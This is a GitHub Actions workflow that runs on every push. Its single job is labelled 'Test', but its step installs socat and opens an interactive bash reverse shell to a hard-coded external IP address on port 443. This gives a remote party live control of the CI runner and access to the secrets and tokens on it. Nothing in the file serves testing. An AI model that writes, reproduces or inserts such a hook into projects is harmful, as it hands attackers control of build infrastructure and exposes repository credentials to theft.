on: [push]

jobs:
  ENV:
    runs-on: ubuntu-latest
    name: Test
    steps:
      - run: |
            sudo apt install socat -y \
            socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:20.115.47.45:443
